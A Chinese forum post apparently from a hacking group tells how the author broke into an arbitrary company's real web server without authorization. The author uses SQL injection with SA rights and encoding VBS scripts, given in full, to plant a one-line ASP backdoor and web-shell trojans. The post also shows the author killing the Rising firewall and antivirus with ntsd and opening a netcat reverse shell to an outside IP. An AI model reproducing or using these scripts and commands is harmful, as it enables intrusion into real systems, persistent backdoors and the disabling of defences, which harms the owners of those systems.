QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 3854|回复: 1
打印 上一主题 下一主题

脚本的巧妙应用

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2005-3-20 13:51 |只看该作者 |倒序浏览
|招呼Ta 关注Ta

作者:haicao [E.S.T]! {* W; L r/ `; [5 j$ H3 e ; `& e- Y) R& Z% g3 D8 O今天在网上看到一个动画动画里说那些大公司的安全做的怎么怎么差,所以我便决定找个看看,在GOOGLE随便输入了"集团",搜索到的第一页随便点击就进了一家公司的网站。随便点了一个连接加了一个单引号 / k) M) F7 v. k. g. M+ E) whttp://www.xxx.com.cn/gushi.asp?pid=8&cid=111' # Y9 P# C: j! y9 J1 Q: \- ~晕,返回错误: " g5 R8 \3 l9 F' ~Microsoft VBScript 编译器错误 错误 '800a03f6' , L3 ~5 W* j- }; `$ J8 M( x2 K( G6 \2 }2 g 缺少 'End' 4 h' Q% y X1 }3 N" [! n 1 ^' t8 X( b/ j% A! V! k6 Z/iisHelp/common/500-100.asp,行242 # Q$ v8 i8 O1 x( q+ d6 ?" L 7 P* a$ W* G. Y6 L Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14' 6 {8 f( t i& O4 `( Q) M6 A- l% w6 N$ s' i% w3 d, F ] e' k* G [Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。 - V: U$ p; o3 b v8 J1 W7 m5 s ! `( N2 H+ c5 W/inc/artid.inc,行8 : ]1 f, Q n* X; A& K返回的信息说明是SQL Server0 @5 o; \& R4 R# w C, a3 v ping www.xxx.com.cn后返回IP:61.XX.XX.68通过IP可以直接访问这个网站,说明是独立的服务器。 & h9 a+ f! R' S; P4 G6 f. Q, j我一下来了兴致看来是家有钱的大公司,用NBSI检测了下这个连接,竟然是SA权限的! . ^1 k1 v% J+ f8 U M2 D8 \* g$ v& n& @$ H1 m * Z" P* k q' p 我用SUPERSCAN扫描了这台主机的开放端口只开放了80及8080端口(都是提供web服务,看来是装了_blank">防火墙,意料之中)。这样的话直接添加用户开3389什么都失去了意义了。只好重新理清头绪。 8 b9 e' O+ a+ L3 j4 q' ]首先想到的是用ECHO写一个ftp.txt文件然后执行ftp -s:ftp.txt来下载一个nc在NBSI里执行命令反向连接过来就可以得到它的系统权限了,但在用ECHO写文件时又出了问题了,我输入一条ECHO命令竟然执行了四次。如图我输入命令 echo open ftp.eviloctal.com>>e:\xxxweb\app\3.txt(e:\xxxweb为网站根目录)竟然往文件里写入了四次这样的话直接用ftp.txt下载文件肯定没戏。 / Q7 }) j% p, T" u7 G! Q( j* A' O ~ ` A) ~ 5 R6 w3 ]6 C3 u6 w8 s, t& _. n- n5 ]* q a) F (特别提示:用NBSI执行命令的时侯最好不要勾选尝试返回结果,因为执行命令会很慢很慢,而用重定向符">>"把命令的执行结果重定向输出到web目录比如dir c:\可以写成dir c:\ >> e:\xxxweb\app\1.txt这样速度很快然后通过浏览器查看命令执行结果浏览http://www.xxx.com.cn/app/1.txt e:\xxxweb为网站的根目录): J9 G% |( y- Y3 O, j2 W 2 x: v9 q a5 a+ ]8 [5 ?3 \1 C 如果能把那个一句话的后门(服务端:)写到WEB目录就好办了,但是不管怎么ECHO %也被过滤掉了。在本地执行echo ^的文件,但在NBSI里执行时无论如何生成的文件中%被过滤了。内容变成:1 A4 W- B1 Q6 ^ & K- f0 z& M; ~( K0 g3 K7 G <execute request("l")> ( _3 [5 Q1 c4 i% r9 i& @<execute request("l")> + R% R u- L+ d! z3 r+ u9 m<execute request("l")> x1 l( X. `9 W5 N5 D<execute request("l")> , i9 m+ L2 [8 v0 n % b* e+ q! H$ S7 a6 j7 S, P , c7 e! N$ Y$ w( v9 e这样的话,就没办法直接写一句话的ASP服务端后门了。(内容为四句原因同上)我想到了先写一个VBS脚本然后把要写的文件内容作为参数传递给VBS脚本去处理生成相应的文件。' {2 V- g9 [4 |4 M4 M9 A% w. [6 z 写文件的脚本writefile.vbs(命令格式为cscript writefile.vbs "要写的字串" 目标文件)内容为:$ B9 V( i! ]& N# n1 Z/ F. J8 u/ z2 |3 c on error resume next:x=1: 5 ~. N% x1 L" u: p, N4 A! o5 Lstr=replace(Wscript.Arguments(0),"==",vbcrlf): '将==替换回车" |9 ]0 ^, u9 x3 D9 x str=replace(str,"**",""""): ‘将**替换为符号"- h3 i# }7 q% P str=replace(str,"--",chr(38)): ‘将--替换为符号 & & n4 j" ~, a% k. Sstr=replace(str,"@@",chr(37)): '将@@替换符号%, V# J5 W( }7 E- \/ g: I7 z3 `* u Set fso = CreateObject("Scripting.FileSystemObject"): # q( i6 E' @. @, n: }( h0 ySet a = fso.CreateTextFile(Wscript.Arguments(1),true): ‘创建文件,文件名为执行时给出的第二个参数 3 s7 k( v6 y/ k3 I! E+ dif x=1 then a.Write(str):x=2:set fso=nothing:set a=nothing end if:' C0 h- B4 B: \0 d- m' [/ p 这个文件得用ECHO命令把它写到服务器上xxx.vbe或xxx.vbs,然后用这个VBS写我们要的文件。(上面中因为像",%,&,回车符 是不能直接作为参数传递给脚本文件的,所以还需要对这些字符进行替换。下面的脚本trans.vbs将完成相反的过程)# q5 M* B: s7 t& h" P1 y- w4 e 简单解释一下:第一条语句是最重要的,容错语句不管后面的程序出了什么错都继续执行。其次是IF语句,为了避免多条语句重复向文件写入同样的内容用了一个标志若x=1才执行写文件,写完马上把x赋值为2。其次可能你会感到奇怪为什么每条语句后加了:,其实是因为我考虑到如果在同一行有多条相同的语句的时侯可以保证程序还能执行。比如: & Q- G, U G+ F' r; C. rstr=replace(Wscript.Arguments(0),"==",vbcrlf):str=replace(Wscript.Arguments(0),"==",vbcrlf): 9 w* j! L. x" {- b* Y2 A若写成str=replace(Wscript.Arguments(0),"==",vbcrlf) ( Q( `9 J- u2 U5 d# R) g则一行显示多条相同语句时变成' |% b( p* C6 w6 c& e str=replace(Wscript.Arguments(0),"==",vbcrlf)str=replace(Wscript.Arguments(0),"==",vbcrlf)+ N6 H' C4 A; W7 \& R% V! F 这样程序便不能正常执行了。 6 o5 H, ?6 p3 z# ?. p",%,&,回车符 是不能直接作为参数传递给脚本文件,容易看出用==代替了回车,用**代替了双引号,用--代替了&,用@@代替了%.在执行写文件得先把我们要写的文件比如转换成writefile.vbs可以接受的格式。用下面的脚本转换trans.vbs(命令格式为cscript trans.vbs 源文件 目标文件):; V$ d7 Q0 Q" T: Q* x3 x) G5 O1 e on error resume next4 J- M4 ~& i- d if Wscript.Arguments.count<>2 then ) _ h' B& { @2 J6 J5 t wscript.echo "参数有误啦 格式为:cscript trans.vbs 源文件 目标文件"( k8 m2 a% m9 ~, H4 ~1 m wscript.quit - l+ Y& m2 Z k Z3 k6 v4 fend if& }. W5 Q* a5 u# S8 H. E Set fso=CreateObject("Scripting.FileSystemObject") 0 ~. ~! z& U3 I# WSet a=fso.openTextFile(Wscript.Arguments(0)) " d4 z# r& O3 Z' Kstr=a.readall1 `0 i5 a- R. w" S str=replace(str,"""","**") '把双引号替换成** $ }2 J5 O/ v5 h# X3 X- G: e Sstr=replace(str,vbcrlf,"==") '把回车替换成== % r% p7 X7 a. X' j' [str=replace(str,"&","--") '把&号替换成--7 a. b/ o* L7 j4 z str=replace(str,"%","@@") '把%替换成@@9 v" m& r# W: ^' v4 K; F) ? wscript.echo str # Q5 z. C. A6 C, w" g1 tSet a=fso.CreateTextFile(Wscript.Arguments(1), True). ?6 L7 I& l" ~4 |; u a.Write(str)# S2 T/ W( n: e0 F" }) {0 n * }; m8 x y4 z$ C2 X1 e w- J: {在本地执行cscript trans.vbs one.txt onetrans.txt) o( _/ X) ^2 q, @1 X5 O% P 其中one.txt为我们的一句话后门内容为:+ a$ j+ p6 K& W6 L, _! C/ w 转换后内容存在onetrans.txt中内容变成转换后的:<@@execute request(**l**)@@>保存在文件onetrans.txt中。- g9 f# y: i6 R4 J writefile.vbs的ECHO代码为: 0 o1 c+ p# O+ ^! J5 \% o3 lecho on error resume next:x=1:>>writefile.vbe p4 h. Y3 R7 H6 b echo str=replace(Wscript.Arguments(0),"==",vbcrlf):>>writefile.vbe 4 m9 `+ B0 G ?4 S4 { b2 L3 fecho str=replace(str,"**",""""):>>writefile.vbe 8 ?7 P" {( ?" I% n echo str=replace(str,"--",chr(38)):>>writefile.vbe . }* G/ K; \" C2 J7 l echo str=replace(str,"@@",chr(37)):>>writefile.vbe 0 B; C/ k* u H5 gecho Set fso = CreateObject("Scripting.FileSystemObject"):>>writefile.vbe$ ?$ H: b# ~; a# S/ Q7 o4 g" j echo Set a = fso.CreateTextFile(Wscript.Arguments(1),true):>>writefile.vbe ' D3 s- x! x$ j1 A6 [, e( kecho if x=1 then a.Write(str):x=2:set fso=nothing:set a=nothing end if:>>writefile.vbe2 u7 P8 H" r5 l. ?. L, W/ L # h2 X6 I3 n2 b- N2 d, D把上面的命令一句句拿到NBSI的NB Commander 命令执行器上执行一下就在对方的系统目录下写进了一个文件writefile.vbe,接着就可以把一句话的服务器的后门写到对方WEB目录下了!命令为:& _1 \ o: U* L! E* I cscript writefile.vbe "<@@execute request(**l**)@@>" d:\web\app\1.asp (注意当传递给脚本的参数中含空格时一定得用两个双引号括起来!)# p V0 Q4 @# r; f: {. |7 w 相应的地址为:http://www.xxx.com.cn/app/1.asp $ [+ C, Q; Q- O把post.htm的form action指向这个地址我们就可以在本地把我们的木马上传到服务器上了!如图: : I, d! c: t1 K % ` y/ W; W3 F. U0 ^' m; E. y! s1 K9 B% V* x1 T! ~0 T 执行post.htm在下面的文本框中粘贴一下我们用来保存文件的ASP木马。并点击upload当成功转向EST论坛时说明ASP木马上传成功了! / b! H* M' r* F- x$ c: b ! W5 B( h1 P3 P+ F* Q我很顺利的把保存文件的木马上传到了服务器上文件名为advv.asp.如图: 5 a* H. e. ]- {1 O2 J( Y9 d' U8 e# s6 h 我把这个木马加了验证所以必须得通过这个url才能顺利访问: / I& Z3 s/ t \4 x k! b/ |http://www.xxx.com.cn/app/advv.asp?id=haicao (当未加参数id=haicao时显示空页面)

zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

实现密码验证的功能很简单只要在ASP文件头部加上以下语句就可以了其中的haicao为密码可以自已修改。 ! S- W( K& [" E F9 }0 X$ A& h0 y8 x. P 用保存文件木马(这里上传后文件为advv.asp)上传cmd.asp(同样加了密码验证haicao)/ F/ G3 |4 P5 {6 t 上传了列举进程的脚本,文件名保存为list2.vbe: 4 E% z' Z. ]9 r- t( Ywscript.echo "PID ProcessName" % n1 T& N7 N4 K$ F: W6 @6 ?for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ '<-这边有个空格- p2 p2 |4 N8 a7 b( C3 x& u wscript.echo ps.handle&vbtab&ps.name! \0 t6 L1 g# L' U next $ h6 ^7 Z2 k+ ^0 x& O我用writefile.vbe把这个脚本直接写在system32目录(在NBSI中执行。这样运行脚本方便不用指明脚本在所在路径)命令如下:- C2 a/ k4 S8 a1 P6 n" y3 u cscript writefile.vbe "wscript.echo **PID ProcessName**==for each ps in getobject(**winmgmts:\\.\root\cimv2:win32_process**).instances_ ==wscript.echo ps.handle--vbtab--ps.name==next" list2.vbe: n/ A. I$ N3 h/ l (详细使用方法同上) 7 m. h9 n3 a% j列举的进程列表如下:(我直接在cmd.asp下运行cscript list.vbe,也可以在NBSI里运行cscript list.vbe >>e:\xxxweb\app\1.txt然后通过IE查看文件1.txt)6 M# A: E. b3 O+ ] + B9 [* p8 U. c( t% H" C, K% i( U Microsoft (R) Windows Script Host Version 5.6 ( _# [) e/ Q9 V; \, P版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。 & Z1 o+ G- ^0 z# q b% {' f( S$ i! b; I4 X1 C PID ProcessName ' t9 D& R* n8 \/ s7 s; y$ D2 n0 System Idle Process : t5 S7 J! b2 I8 System- t3 z8 J. I. b5 u' i5 y 160 SMSS.EXE G, ]( w+ V4 `, a4 p184 CSRSS.EXE ; A. s. A; Q# H( e) j204 WINLOGON.EXE $ M, i3 k3 j& k. H232 SERVICES.EXE: f A7 {! e: E X4 G. W1 T0 ^6 c# Y 244 LSASS.EXE) N, z& ^% `& t2 Y2 d 448 svchost.exe: D, |& C6 m( R) c1 ]& t 480 spoolsv.exe 8 n# n* P/ f8 ?) Q508 msdtc.exe# {8 W6 `6 ]" [2 P% O1 K 624 svchost.exe- L s8 e/ L/ e& x 652 LLSSRV.EXE z" h4 R* i% C2 s& ? v6 e 692 sqlservr.exe & P. B. i% P1 Q9 R: U! ~, _744 regsvc.exe, g3 O4 W5 Q% z k( _) s2 |# \1 K 780 mstask.exe , k' w* |5 r6 B/ l4 Y3 E; R: m# I848 WinMgmt.exe - b5 Z' R6 j! q$ o1 R1 Y; w900 svchost.exe 1 f/ }# Z7 x: i3 q% L; t920 dfssvc.exe, o9 c' K7 X# w 936 inetinfo.exe0 ?" v7 |, [% T# ~4 @ 952 mssearch.exe8 N8 @6 d7 ~: {/ N 1256 DLLHOST.EXE 3 Z. }% a |$ y3 l7 E1296 DLLHOST.EXE * f$ W% t. h2 B$ f# U1648 svchost.exe, E; Q6 k M. }' L 968 explorer.exe 1 h1 a g; X$ ?& Y% V# d1784 Rfw.exe <-瑞星的网络_blank">防火墙 ! ^7 N% I' C7 j) ?$ _: S% Z1628 internat.exe6 X4 D% v0 r. R' K* U( m7 `5 ^/ U 1612 sqlmangr.exe7 @* _% R; [1 w+ P; R# M 1944 CCenter.exe8 V* f5 ], f# h/ [ 1572 RavTimer.exe 3 z/ Y( y, I! Z6 p1260 Rav.exe ( j& U X c( P1652 RsAgent.exe- c2 K! ]! P$ R 996 agentsvr.exe " t6 G* G4 p7 `2 j! {+ m2048 sqlagent.exe 0 ^8 ?1 J7 I/ _3 L1172 CMD.EXE 3 F' \- a# t" Y; w% v2 ^1 @& ~& o2024 cscript.exe , x. m# Z* d# O第一列为进程ID第二列为进程名。 9 u3 w5 \7 Z! p8 Z开启的服务如下:(命令为net start,执行方法同上) 7 Y* h' o# S- o+ U$ r已经启动以下 Windows 2000 服务: " a, \6 ~: j6 a & d+ X6 n# K9 _' Z Alerter : K5 c8 A7 R- g" n Automatic Updates' \% ~: r/ N' n/ n! S COM+ Event System S3 j* m& }2 p- l* i2 ^& d6 A Computer Browser0 O8 u* {0 H' v DHCP Client , r8 O: s ?; g6 s4 I Y+ ]& ] Distributed File System; ?$ y$ e" s q: l* Z Distributed Link Tracking Client * w0 Y3 x+ w+ w$ {. H Distributed Transaction Coordinator 5 O! j, b4 A o# d DNS Client : V6 b4 Y0 V0 r$ ^1 ]% A Event Log * |0 m" P6 ~, U+ K8 l( j2 S IIS Admin Service ; w) q5 H4 _2 H% b IPSEC Policy Agent' D+ f6 ^! S- x) V7 k# ^3 x License Logging Service1 }* v/ o1 j. S4 A+ ]# h Logical Disk Manager $ X, H/ `/ U0 k/ s Messenger # n( k& I$ v( T$ o Microsoft Search / u# }! K' `7 k$ D" K. v MSSQLSERVER 2 E& H; L) H" |, p; b Network Connections' W6 Y& w; H- h+ G, q- ?1 Z- d4 J" P NT LM Security Support Provider' ]' g I+ b! I" S8 g, x8 G Plug and Play( D+ G6 ~4 C% _5 }/ w& z Print Spooler ( S% N: b* f4 Y; t# Z6 A& M3 Z Protected Storage 9 g* L- E Z/ G6 h" t Remote Access Connection Manager % E7 s& y1 F+ X0 L' G Remote Procedure Call (RPC)0 z+ n' v& F& W4 _& B6 ^ Remote Registry Service : Y: z! Z( z* c& P( }+ h# x Removable Storage( {; c6 L+ S: R$ m3 C: e# V Rising Process Communication Center 1 c- s& O; A; M& s% q8 {( I RunAs Service 8 _+ o* F5 e4 s% K9 X( w3 B" A Security Accounts Manager9 Y3 c: f# u5 r T9 G( ^ Server 6 M- K8 n) H5 B% N5 {7 G Site Server ILS Service! U1 ^# Z$ R2 C$ |4 v2 j4 A SQLSERVERAGENT $ R% j9 Q; h) r System Event Notification p9 E a6 R. |( Q Task Scheduler 6 p, \3 L7 e9 C" w/ e" E: F( e TCP/IP NetBIOS Helper Service ' N1 \+ F1 n" F7 m Telephony 6 ~/ p# E% v$ G- _. }7 D1 O* I' w Windows Management Instrumentation ; l$ z# }. v- D0 ~, G& y Windows Management Instrumentation Driver Extensions 9 |% c+ q* ?/ O Workstation# [ Y f+ Z3 I/ z) m World Wide Web Publishing Service5 O! i' G! K. O % L( H: o$ x! }, o! M: J命令成功完成。 # T2 d" W* F8 A2 a我先后在NBSI里执行了ntsd命令关掉瑞星网络_blank">防火墙及瑞星杀毒软件(命令格式为ntsd -c q -p PID).- |1 y0 a. q: a, H7 w 关掉网络_blank">防火墙后,依然只能连到原先可以访问的80及8080(都是web服务。基本上是硬件_blank">防火墙或者是过滤了tcp端口)还上传了海洋顶端(用advv.asp上传),用海洋顶端上传了NC.EXE,先在本机nc -vv -l -p 80监听后,然后在NBSI里执行反向连接的命令(注:那为什么要在NBSI而不直接在cmd.asp里执行反向连接呢,相信你已经想到了在NBSI里反向过来的是administrator权限而cmd.asp里执行反向命令连接过来的却只有iusr权限,呵呵。 $ X$ Q3 U C( \9 H+ s3 I)nc 222.75.88.181 -r 80 -e cmd.exe其中222.75.88.181是我的IP顺利的得到了对方的shell如图:+ i M7 k) K! F4 Z {7 R4 a' l4 a/ ]4 S- A 3 B2 m2 F# o3 R$ \8 L+ {* }之后我尝试了几个其它的端口依然可以正常的反向连接过来,到此我没再深入下去了,怕怕。 * l6 U! y8 B2 i1 v后记:在上传一句话的服务端ASP后门之前我先用writefile.vbe写了ftp.txt的文件进行下载,但是失败了下载完文件的大小为0字节,开始没仔细看就尝试反向连接,失败了,很郁闷(:后来才发现是FTP下载失败.灵活的应用vbs脚本将会使成功入侵顺利得多,呵呵.这次成功的入侵有一些偶然,因为是独立的服务器权限设置全部是默认的设置,省了不少麻烦。如果是虚拟主机SQL也不可能是SA权限的。这次的入侵有点偶然,但灵活的脚本应用也是这次成功的关键!

文章相关脚本下载:http://haicao.1ki.cn/down/otherscript.rar

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2025-6-12 20:27 , Processed in 0.520487 second(s), 56 queries .

回顶部